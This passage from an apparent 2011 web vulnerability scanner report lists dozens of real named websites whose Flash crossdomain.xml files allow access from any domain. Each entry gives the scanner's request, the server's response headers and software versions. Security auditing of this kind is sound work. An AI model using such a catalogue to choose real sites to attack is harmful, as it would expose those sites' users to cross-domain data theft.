<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.tinierme.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="img.tinierme.com" />
<allow-access-from domain="image1.tinierme.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="image2.tinierme.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*" to-ports="*" />
...[SNIP]...

7.178. http://www.trojancondoms.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trojancondoms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trojancondoms.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Tue, 26 Apr 2011 13:55:00 GMT
Accept-Ranges: bytes
ETag: "eaefd88194cc1:1e0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:03:36 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.179. http://www.truthin2010.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truthin2010.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truthin2010.org

Response

HTTP/1.1 200 OK
Content-Length: 227
Content-Type: text/xml
Last-Modified: Fri, 08 Jan 2010 21:55:23 GMT
Accept-Ranges: bytes
ETag: "435b6647ad90ca1:369"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:30:21 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />


...[SNIP]...

7.180. http://www.tv2.no/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tv2.no
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tv2.no

Response

HTTP/1.1 200 OK
ETag: "37804a-df-45d2e5010ce00"
Content-Type: text/xml
Last-Modified: Thu, 04 Dec 2008 01:16:40 GMT
Keep-Alive: timeout=5, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.2.0 (H;max-age=1200+86400;age=902;ecid=216173134338965972,0)
Accept-Ranges: bytes
Connection: close
Date: Wed, 04 May 2011 00:43:58 GMT
Age: 13
Content-Length: 223

<?xml version="1.0" encoding="iso-8859-1" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>

...[SNIP]...

7.181. http://www.tvb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tvb.com

Response

HTTP/1.0 200 OK
Server: Apache/2
Last-Modified: Tue, 29 Sep 2009 07:26:24 GMT
ETag: "1040f6-cd-474b254e2e800"
Accept-Ranges: bytes
Content-Length: 205
Content-Type: application/xml
Expires: Wed, 04 May 2011 03:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:22:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.182. http://www.tvunetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvunetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tvunetworks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:28 GMT
Server: Apache
Last-Modified: Sun, 13 Dec 2009 14:19:41 GMT
ETag: "1c2945f-94-47a9cd9003940"
Accept-Ranges: bytes
Content-Length: 148
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.183. http://www.unb.ca/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.unb.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.unb.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:40 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.9 mod_ssl/2.2.14 OpenSSL/0.9.8m mod_perl/2.0.3 Perl/v5.8.7
Last-Modified: Thu, 03 Jan 2008 18:41:37 GMT
ETag: "8310-c9-442d5be7455a6"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
...[SNIP]...

7.184. http://www.v103.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.v103.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.v103.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3187877899
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:17:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:17:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.185. http://www.veria.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veria.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.veria.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:51 GMT
Server: Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.6
Last-Modified: Wed, 24 Nov 2010 16:27:36 GMT
ETag: "400000000003e-d5-495cef7915351"
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-d
...[SNIP]...

7.186. http://www.videoboxmen.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videoboxmen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.videoboxmen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:30 GMT
Server: Apache
Last-Modified: Fri, 30 Apr 2010 21:46:22 GMT
ETag: "8f"
Accept-Ranges: bytes
Content-Length: 143
Vary: Accept-Encoding,User-Agent
X-Meta: S=app20
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

7.187. http://www.virginialottery.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virginialottery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.virginialottery.com

Response

HTTP/1.1 200 OK
Content-Length: 151
Content-Type: text/xml
Last-Modified: Fri, 21 Oct 2005 16:06:00 GMT
Accept-Ranges: bytes
ETag: "06455459d6c51:f7d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:01 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.188. http://www.virginiasports.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virginiasports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.virginiasports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:46 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.189. http://www.vizury.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vizury.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vizury.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:20 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 18 Feb 2011 23:30:51 GMT
ETag: "e3db-144-49c96e79260c0"
Accept-Ranges: bytes
Content-Length: 324
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.190. http://www.votigo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.votigo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.votigo.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NJMZMZS192.168.1.178CKMLY; path=/
Date: Wed, 04 May 2011 03:03:40 GMT
Server: Apache
Last-Modified: Tue, 01 Feb 2011 08:54:28 GMT
ETag: "23d8dfb-158-49b34ae141900"
Accept-Ranges: bytes
Content-Length: 344
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.191. http://www.vpntrack.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vpntrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vpntrack.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:26 GMT
Server: Apache/2.2.14 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Mon, 14 Dec 2009 23:15:56 GMT
ETag: "1b08045-fb-47ab8749f2300"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

7.192. http://www.walkjogrun.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walkjogrun.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walkjogrun.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 11 Jan 2011 03:37:09 GMT
ETag: "246e8-4d-49989cc992340"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: application/xml
X-Pad: avoid browser bug

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.193. http://www.warcry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.warcry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.warcry.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:33 GMT
Server: Apache
Last-Modified: Thu, 22 May 2008 15:54:40 GMT
Accept-Ranges: bytes
Content-Length: 215
Cache-Control: max-age=172800
Expires: Fri, 06 May 2011 00:56:33 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross
...[SNIP]...

7.194. http://www.wben.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wben.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wben.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:26 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Wed, 23 Apr 2008 18:04:28 GMT
ETag: "1c75a-125-480f7a2c"
Accept-Ranges: bytes
Content-Length: 293
Keep-Alive: timeout=5
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerRadio_Pool=2500872259.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-
...[SNIP]...

7.195. http://www.wcvirtualversion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcvirtualversion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wcvirtualversion.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Wed, 04 May 2011 02:24:58 GMT
Content-Type: text/xml
Connection: close
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Length: 410
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cloudfront.net" />
<allow-access-from domain="cdn.mydigitalpublication.com" />
...[SNIP]...

7.196. http://www.wdasfm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wdasfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3191995260 3191888599
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 03:36:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:36:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.197. http://www.wect.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wect.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9bf"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 03:23:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 03:23:15 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.198. http://www.wego.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wego.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wego.com

Response

HTTP/1.1 200 OK
Server: nginx/ask J
Date: Wed, 04 May 2011 01:56:13 GMT
Content-Type: text/xml
Content-Length: 211
Last-Modified: Tue, 01 Feb 2011 08:24:16 GMT
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CUR ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM CNT STA"
Cache-Control: private, max-age=1800
Age: 0
Expires: Wed, 04 May 2011 02:26:13 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-dom
...[SNIP]...

7.199. http://www.wendy4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wendy4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wendy4.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:56 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Vary: Accept-Encoding
Last-Modified: Tue, 07 Dec 2010 05:26:10 GMT
ETag: "46700c-cb-4cfdc572"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.200. http://www.wgar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wgar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wgar.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3192439667
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 03:55:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:55:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.201. http://www.wham1180.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wham1180.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wham1180.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3192701787
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 04:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 04:07:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.202. http://www.wideo.fr/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wideo.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wideo.fr

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1697549"
Last-Modified: Wed, 16 Jun 2010 12:56:54 GMT
Content-Length: 289
Connection: close
Date: Wed, 04 May 2011 01:11:53 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow
...[SNIP]...

7.203. http://www.wmagazine.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wmagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wmagazine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a
Last-Modified: Mon, 25 Apr 2011 14:22:10 GMT
ETag: "c5a-85-4a1beeeda8880"-gzip
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Wed, 04 May 2011 02:19:31 GMT
Date: Wed, 04 May 2011 02:09:31 GMT
Content-Length: 133
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>


7.204. http://www.woio.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woio.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.woio.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac9"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 01:59:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:59:39 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.205. http://www.wor710.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wor710.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:07 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
Last-Modified: Tue, 08 Mar 2011 20:53:11 GMT
ETag: "416de-125-4d769737"
Accept-Ranges: bytes
Content-Length: 293
Keep-Alive: timeout=5, max=19966
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerRadio_Pool=4145039427.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-
...[SNIP]...

7.206. http://www.wowtattoos.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowtattoos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wowtattoos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:26 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 05:45:07 GMT
ETag: "e1"
Accept-Ranges: bytes
Content-Length: 225
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

